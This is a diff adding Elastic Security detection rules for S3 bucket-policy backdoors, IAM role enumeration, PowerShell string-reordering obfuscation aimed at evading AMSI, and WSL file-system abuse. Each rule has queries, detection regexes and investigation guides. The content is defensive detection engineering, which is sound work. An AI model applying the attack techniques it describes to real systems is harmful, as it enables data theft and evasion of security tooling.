steps\n\n- Review the process details for the \"dllhost.exe\" instance that triggered the alert, focusing on the command line arguments to confirm the presence of the Plan9FileSystem CLSID \"{DFB65C4C-B34F-435D-AFE9-A86218684AA8}\".\n- Examine the file paths involved in the alert to determine if any sensitive or critical files were accessed or modified outside of typical user directories, excluding the Downloads folder.\n- Investigate the parent process of \"dllhost.exe\" to understand the context of its execution and identify any potentially malicious parent processes.\n- Check the timeline of events leading up to and following the alert to identify any other suspicious activities or related alerts that may indicate a broader attack pattern.\n- Correlate the alert with user activity logs to determine if the actions were performed by a legitimate user or if there are signs of compromised credentials or unauthorized access.\n\n### False positive analysis\n\n- Routine file operations by legitimate applications using WSL may trigger alerts. Identify and whitelist these applications to prevent unnecessary alerts.\n- Development activities involving WSL, such as compiling code or running scripts, can generate false positives. Exclude specific development directories or processes from monitoring.\n- Automated backup or synchronization tools that interact with WSL might be flagged. Configure exceptions for these tools by specifying their process names or file paths.\n- System maintenance tasks that involve WSL, like updates or system checks, could be mistaken for suspicious activity. Schedule these tasks during known maintenance windows and adjust monitoring rules accordingly.\n- Frequent downloads or file transfers to directories outside the typical user download paths may appear suspicious. Define clear policies for acceptable file paths and exclude them from alerts.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further unauthorized access or data exfiltration.\n- Terminate any suspicious processes associated with \"dllhost.exe\" that are linked to the Plan9FileSystem CLSID to stop ongoing malicious activities.\n- Conduct a thorough review of recent file changes on the host system to identify and restore any unauthorized modifications or deletions.\n- Revoke any unauthorized access or permissions granted to WSL that may have been exploited by the adversary.\n- Update and patch the Windows Subsystem for Linux and related components to mitigate any known vulnerabilities that could be exploited.\n- Monitor for any recurrence of similar activities by setting up alerts for processes and file operations involving \"dllhost.exe\" and the Plan9FileSystem.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.", + "query": "sequence by process.entity_id with maxspan=5m\n[process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"dllhost.exe\" and\n /* Plan9FileSystem CLSID - WSL Host File System Worker */\n process.command_line : \"*{DFB65C4C-B34F-435D-AFE9-A86218684AA8}*\"]\n[file where host.os.type == \"windows\" and process.name : \"dllhost.exe\" and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\DLLHOST.exe-????????.pf\")]\n", + "references": [ + "https://github.com/microsoft/WSL" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e88d1fe9-b2f4-48d4-bace-a026dc745d4b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", + "Data Source: SentinelOne" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "e88d1fe9-b2f4-48d4-bace-a026dc745d4b_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e8c9ff14-fd1e-11ee-a0df-f661ea17fbce_7.json b/packages/security_detection_engine/kibana/security_rule/e8c9ff14-fd1e-11ee-a0df-f661ea17fbce_7.json new file mode 100644 index 00000000000..e7a5e3669a2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e8c9ff14-fd1e-11ee-a0df-f661ea17fbce_7.json @@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an Amazon S3 bucket policy is modified to share access with an external AWS account. This rule analyzes PutBucketPolicy events and compares the S3 bucket\u2019s account ID to any account IDs referenced in the policy\u2019s Effect=Allow statements. If the policy includes principals from accounts other than the bucket owner\u2019s, the rule triggers an alert. This behavior may indicate an adversary backdooring a bucket for data exfiltration or cross-account persistence. For example, an attacker who compromises credentials could attach a policy allowing access from an external AWS account they control, enabling continued access even after credentials are rotated. Note: This rule will not alert if the account ID is part of the bucket\u2019s name or appears in the resource ARN. Such cases are common in standardized naming conventions (e.g., \u201cmybucket-123456789012\u201d). To ensure full coverage, use complementary rules to monitor for suspicious PutBucketPolicy API requests targeting buckets with account IDs embedded in their names or resources.", + "event_category_override": "event.type", + "false_positives": [ + "Legitimate changes to share an S3 bucket with an external account may be identified as false positives." + ], + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "aws.cloudtrail.resources.arn", + "aws.cloudtrail.resources.type", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS S3 Bucket Policy Added to Share with External Account", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS S3 Bucket Policy Added to Share with External Account\n\nThis rule detects when an S3 bucket policy is modified using the `PutBucketPolicy` API call to include an external AWS account ID.\nIt compares the bucket\u2019s `recipient_account_id` to any account IDs included in the policy\u2019s `Effect=Allow` statement, triggering\nan alert if the two do not match. \n\nAdversaries may exploit this to backdoor a bucket and exfiltrate sensitive data by granting permissions to another AWS account\nthey control, enabling ongoing access to the bucket\u2019s contents even if IAM credentials are rotated or revoked.\n\nThis detection specifically focuses on policy-based sharing and does not alert when:\n- The account ID appears within the bucket or object name being shared.\n- The account owner explicitly matches the policy\u2019s condition keys on something other than an ARN or account id (i.e. IP address).\n \nTo fully monitor for suspicious sharing behavior, use this rule in combination with detections for:\n- Unusual PutBucketPolicy requests\n- Cross-account object access (e.g., `GetObject`, `PutObject`)\n- Changes to bucket ACLs or access points\n\n#### Possible investigation steps\n\n- **Identify the Actor and Context**\n - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to identify who made the change.\n - Determine if the identity typically manages S3 bucket policies. \n - Examine `aws.cloudtrail.resources.arn` to determine which bucket is being shared.\n\n- **Analyze the Policy Change**\n - Review `aws.cloudtrail.request_parameters` to extract the policy JSON and identify the external AWS account ID(s) referenced. \n - Check for `Effect=Allow` statements granting broad permissions such as `\"Action\": \"s3:*\"` or `\"Resource\": \"*\"`. \n - Verify if the added principals correspond to known partners or external vendors.\n - If AWS account ID(s) were only part of `Effect=Deny` statements, then this rule can be closed as a false positive. \n\n- **Review Context and Source**\n - Check `source.ip`, `source.geo`, and `user_agent.original` for anomalies \u2014 such as new IP ranges, access from unfamiliar geographies, or use of programmatic clients (`boto3`, `aws-cli`).\n\n- **Correlate with Related Activity**\n - Search CloudTrail for subsequent activity by the external AWS account ID(s):\n - `GetObject`, `ListBucket`, or `PutObject` events that indicate data access or exfiltration.\n - Look for additional configuration changes by the same actor, such as:\n - `PutBucketAcl`, `PutBucketVersioning`, or `PutBucketReplication` \u2014 often part of a larger bucket compromise chain.\n - Determine if multiple buckets were modified in quick succession.\n\n- **Validate Intent**\n - Review internal change requests or documentation to confirm whether this external sharing was approved. \n - If no approval exists, escalate immediately for potential compromise.\n\n### False positive analysis\n\n- **Authorized Cross-Account Access**\n - Some organizations legitimately share S3 buckets across accounts within a trusted AWS Organization or partner accounts. \n - Validate whether the external account ID belongs to a known entity or service provider and is documented in your allowlist.\n- **Automation or Deployment Pipelines**\n - Continuous integration/deployment pipelines may temporarily attach cross-account policies for replication or staging. \n - Verify the `user_agent.original` or role name \u2014 automation often includes identifiable strings.\n- **Naming and Rule Logic Limitations**\n - This rule excludes detections where the account ID appears in the bucket resource ARN (e.g., `mybucket-123456789012`). \n - Such patterns are common in automated provisioning. For those scenarios, rely on complementary rules that directly monitor `PutBucketPolicy` events against those buckets.\n\n### Response and remediation\n\n- **Immediate Review and Containment**\n - If unauthorized sharing is confirmed, use the AWS CLI or Console to delete or revert the modified policy (`aws s3api delete-bucket-policy` or restore from version control). \n - Remove external principals and reapply the correct bucket policy. \n - Rotate access keys for the actor involved, especially if API access came from unexpected locations or tools.\n\n- **Investigation and Scoping**\n - Identify whether data was accessed by the external account via `GetObject` or `ListBucket` operations. \n - Search CloudTrail logs for other buckets modified by the same actor or IP within the same timeframe.\n - Use AWS Config to review version history of affected bucket policies and detect similar cross-account permissions.\n\n- **Recovery and Hardening**\n - Restrict `s3:PutBucketPolicy` to a limited set of administrative roles using least privilege.\n - Enable AWS Config rule `s3-bucket-policy-grantee-check` to monitor for unauthorized policy additions.\n - Use AWS GuardDuty or Security Hub findings to correlate policy changes with data exfiltration or credential compromise events.\n - Apply service control policies (SCPs) to block cross-account sharing unless explicitly approved.\n\n### Additional information\n - **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n - **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n - **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "info where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"s3.amazonaws.com\"\n and event.action == \"PutBucketPolicy\" \n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"Effect=Allow\")\n and (\n stringContains(aws.cloudtrail.request_parameters, \"AWS=\") or \n stringContains(aws.cloudtrail.request_parameters, \"aws:PrincipalAccount=\") or\n stringContains(aws.cloudtrail.request_parameters, \"aws:SourceAccount=\")\n )\nand not stringContains(aws.cloudtrail.request_parameters, \"arn:aws:cloudfront::\") \nand not stringContains(aws.cloudtrail.request_parameters, \"arn:aws:iam::cloudfront:user\")\nand not stringContains(aws.cloudtrail.request_parameters, aws.cloudtrail.recipient_account_id)\n", + "references": [ + "https://stratus-red-team.cloud/attack-techniques/AWS/aws.exfiltration.s3-backdoor-bucket-policy/", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketPolicy.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.recipient_account_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e8c9ff14-fd1e-11ee-a0df-f661ea17fbce", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Collection", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1530", + "name": "Data from Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1530/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "e8c9ff14-fd1e-11ee-a0df-f661ea17fbce_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_8.json b/packages/security_detection_engine/kibana/security_rule/e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_8.json new file mode 100644 index 00000000000..4b68373088f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_8.json @@ -0,0 +1,178 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that use string reordering and runtime reconstruction techniques as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscation via String Reordering", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via String Reordering\n\nPowerShell, a powerful scripting language in Windows environments, can be exploited by adversaries using obfuscation techniques like string reordering to evade detection. This involves rearranging strings and reconstructing them at runtime, bypassing static analysis and security measures. The detection rule identifies scripts with excessive length and specific patterns, flagging those with multiple occurrences of string format expressions, which are indicative of obfuscation attempts. By filtering out known benign patterns, it reduces false positives, focusing on genuine threats.\n\n### Possible investigation steps\n\n- Review the script block text by examining the powershell.file.script_block_text field to understand the nature of the obfuscation and identify any potentially malicious commands or patterns.\n- Check the file.path and file.name fields to determine the origin and context of the script, which can provide insights into whether the script is part of a legitimate application or a potential threat.\n- Investigate the host.name and user.id fields to identify the affected system and user, which can help in assessing the potential impact and scope of the incident.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and history of the script, which may reveal additional suspicious activities or related scripts.\n- Correlate the alert with other security events or logs from the same host or user to identify any patterns or additional indicators of compromise that may suggest a broader attack campaign.\n\n### False positive analysis\n\n- Scripts related to the Icinga Framework may trigger false positives due to their use of string formatting. To handle this, ensure that the file name \"framework_cache.psm1\" is excluded from the detection rule.\n- PowerShell scripts that include specific sentinel patterns, such as \"sentinelbreakpoints\" or paths like \":::::\\windows\\sentinel\", combined with variables like \"$local:Bypassed\" or \"origPSExecutionPolicyPreference\", are known to be benign. These should be excluded to reduce noise.\n- Regularly review and update the exclusion list to include any new benign patterns that are identified over time, ensuring the rule remains effective without generating unnecessary alerts.\n- Consider implementing a whitelist of known safe scripts or script authors to further minimize false positives, especially in environments with frequent legitimate use of complex PowerShell scripts.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further spread of potentially malicious scripts.\n- Terminate any suspicious PowerShell processes identified by the alert to stop ongoing malicious activity.\n- Conduct a thorough review of the PowerShell script block text flagged by the alert to understand the intent and potential impact of the obfuscated script.\n- Remove any malicious scripts or files identified during the investigation from the affected system to prevent re-execution.\n- Restore the system from a known good backup if the script has caused significant changes or damage to the system.\n- Update and strengthen endpoint protection measures, ensuring that AMSI and other security tools are fully operational and configured to detect similar obfuscation techniques.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\" and powershell.file.script_block_text like \"*{0}*\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"((\\{\\d+\\}){2,}[\"']\\s?-f|::Format[^\\{]+(\\{\\d+\\}){2,})\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.directory,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least four times\n| where Esql.script_block_pattern_count >= 4\n\n// Exclude Noisy Patterns\n\n// Icinga Framework\n| where not file.directory == \"C:\\\\Program Files\\\\WindowsPowerShell\\\\Modules\\\\icinga-powershell-framework\\\\cache\"\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory IS NULL\n\n| where not (powershell.file.script_block_text LIKE \"*GitBranchStatus*\" AND \n powershell.file.script_block_text LIKE \"*$s.BranchBehindStatusSymbol.Text*\")\n| where not\n // https://wtfbins.wtf/17\n (\n (powershell.file.script_block_text like \"*sentinelbreakpoints*\" or\n powershell.file.script_block_text like \"*:::::\\\\\\\\windows\\\\\\\\sentinel*\")\n and\n (powershell.file.script_block_text like \"*$local:Bypassed*\" or\n powershell.file.script_block_text like \"*origPSExecutionPolicyPreference*\")\n )\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_length", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e903ce9a-5ce6-4246-bb14-75ed3ec2edf5", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 8 + }, + "id": "e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_213.json b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_213.json new file mode 100644 index 00000000000..8445d8e112c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_213.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects repeated failed attempts to update an IAM role\u2019s trust policy in an AWS account, consistent with role and user enumeration techniques. In this technique, an attacker who controls credentials in the current account repeatedly calls UpdateAssumeRolePolicy on a single role, cycling through guessed cross-account role or user ARNs as the principal. When those principals are invalid, IAM returns MalformedPolicyDocumentException, producing a burst of failed UpdateAssumeRolePolicy events. This rule alerts on that brute-force pattern originating from this account, which may indicate that the account is being used as attack infrastructure or that offensive tooling (such as Pacu) is running here. Note: this rule does not detect other accounts enumerating roles, because those API calls are logged in the caller\u2019s account, not the target account.", + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS IAM Principal Enumeration via UpdateAssumeRolePolicy", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS IAM Principal Enumeration via UpdateAssumeRolePolicy\n\nThis rule detects bursts of failed attempts to update an IAM role\u2019s trust policy \u2014 typically resulting in `MalformedPolicyDocumentException` errors \u2014 which can indicate enumeration of IAM principals. \nAdversaries who have obtained valid AWS credentials may attempt to identify roles or accounts that can be assumed by repeatedly modifying a role\u2019s trust relationship using guessed `Principal` ARNs. \nWhen these principals are invalid, IAM rejects the request, creating a recognizable sequence of failed `UpdateAssumeRolePolicy` events.\n\nBecause this is a threshold rule, it triggers when the number of failures exceeds a defined count within a short period. This pattern suggests brute-force-style enumeration rather than normal misconfiguration.\n\n#### Possible investigation steps\n\n- **Validate the context of the threshold trigger**\n - Review the `@timestamp` range for when the burst occurred and the number of failed attempts in the threshold window.\n - Identify whether all failures targeted the same `RoleName` or multiple roles \u2014 targeting a single role is often indicative of brute-force enumeration.\n - Confirm the source identity and IP address (`aws.cloudtrail.user_identity.arn`, `source.ip`, `user_agent.original`) to determine whether these calls originated from a known automation process or an unexpected host.\n\n- **Correlate with other IAM activity**\n - Look for any subsequent successful `UpdateAssumeRolePolicy` or `AssumeRole` calls, which may indicate the attacker eventually discovered a valid principal.\n - Search for reconnaissance-related API calls (`ListRoles`, `ListUsers`, `GetCallerIdentity`) before the threshold event \u2014 these often precede enumeration bursts.\n - Investigate whether other suspicious role- or identity-related actions occurred near the same timeframe, such as `CreateRole`, `PutRolePolicy`, or `AttachRolePolicy`.\n\n- **Identify infrastructure patterns**\n - Examine the `user_agent.original` field \u2014 the presence of automation frameworks or penetration tools (e.g., \u201cBoto3\u201d, \u201cPacu\u201d) may signal offensive tooling.\n - Review the `source.ip` or `cloud.account.id` fields to see whether this account may be acting as attacker-controlled infrastructure attempting to enumerate roles in other environments.\n\n- **Validate authorization**\n - Confirm with your DevOps or Cloud IAM teams whether any expected testing, migration, or cross-account role configuration changes were planned for this time period.\n - If the identity performing these actions does not typically manage IAM roles or trust relationships, escalate for investigation as a possible credential compromise.\n\n### False positive analysis\n\n- **Legitimate automation retries**\n - Continuous integration or configuration management systems may retry failed IAM API calls during deployment rollouts. \n If the same IAM role was being updated as part of a known change, validate the timing and source identity before closing as benign.\n- **Misconfigured scripts or infrastructure drift**\n - Scripts that deploy trust policies using outdated or invalid ARNs can cause repetitive failures that mimic brute-force patterns. \n Review the `RoleName` and `Principal` ARNs included in the failed requests to confirm if they correspond to known but outdated configurations.\n\n### Response and remediation\n\n- **Immediate review and containment**\n - Investigate whether the source account is being used for offensive operations or compromised automation.\n - Disable or suspend the IAM user or access key responsible for the enumeration burst.\n - If activity originated from a workload or CI/CD system, audit its access keys and environment variables for compromise.\n\n- **Investigation and scoping**\n - Review CloudTrail logs for other IAM or STS actions from the same source in the preceding and following 24 hours.\n - Check for any successful privilege changes (`PutRolePolicy`, `AttachRolePolicy`, or `AssumeRole`) by the same identity.\n - Determine if other roles in the same account experienced similar failed updates or bursts.\n\n- **Recovery and hardening**\n - Rotate credentials for any identities involved.\n - Limit permissions to modify trust policies (`iam:UpdateAssumeRolePolicy`) to a small set of administrative roles.\n - Enable AWS Config rule `iam-role-trust-policy-check` to detect overly permissive or unusual trust relationships.\n - Use AWS GuardDuty or Security Hub to monitor for subsequent privilege escalation or reconnaissance findings.\n - Review the event against AWS Incident Response Playbook guidance (containment > investigation > recovery > hardening).\n\n### Additional information\n - **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n - **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n - **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/)\n", + "query": "event.dataset: \"aws.cloudtrail\" \n and event.provider: \"iam.amazonaws.com\" \n and event.action: \"UpdateAssumeRolePolicy\" \n and aws.cloudtrail.error_code: \"MalformedPolicyDocumentException\" \n and event.outcome: \"failure\"\n", + "references": [ + "https://www.praetorian.com/blog/aws-iam-assume-role-vulnerabilities", + "https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.error_code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ea248a02-bc47-4043-8e94-2885b19b2636", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Discovery", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.004", + "name": "Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1087/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "cloud.account.id", + "user.name", + "source.ip" + ], + "value": 25 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 213 + }, + "id": "ea248a02-bc47-4043-8e94-2885b19b2636_213", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eaa77d63-9679-4ce3-be25-3ba8b795e5fa_108.json b/packages/security_detection_engine/kibana/security_rule/eaa77d63-9679-4ce3-be25-3ba8b795e5fa_108.json new file mode 100644 index 00000000000..adeeeb80c28 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eaa77d63-9679-4ce3-be25-3ba8b795e5fa_108.json @@ -0,0 +1,127 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job detected an unusually large spike in network traffic that was denied by network access control lists (ACLs) or firewall rules. Such a burst of denied traffic is usually caused by either 1) a mis-configured application or firewall or 2) suspicious or malicious activity. Unsuccessful attempts at network transit, in order to connect to command-and-control (C2), or engage in data exfiltration, may produce a burst of failed connections. This could also be due to unusually large amounts of reconnaissance or enumeration traffic. Denial-of-service attacks or traffic floods may also produce such a surge in traffic.", + "false_positives": [ + "A misconfgured network application or firewall may trigger this alert. Security scans or test cycles may trigger this alert." + ], + "from": "now-30m", + "interval": 